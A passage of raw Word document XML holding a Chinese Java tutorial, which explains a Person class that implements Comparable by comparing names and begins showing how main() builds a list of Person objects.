      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下面对这个程序进行说明。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a) Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类定义。如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>private static class Person implements Comparable&lt;Person&gt;{</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    int age;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    String name;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        ...</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    /**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     * @desc </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Comparable&lt;String&gt;” </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的接口，即重写</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>compareTo&lt;T t&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     *  </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的名字</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行比较的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    public int compareTo(Person person) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        return name.compareTo(person.name);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        //return this.name - person.name;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    }  </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(01) Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类代表一个人，</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Persong</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类中有两个属性：</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>age(</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>年纪</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> name“</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>人名</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rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(02) Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口，因此它能被排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，我们创建了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数组</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(list)</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ArrayList(</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
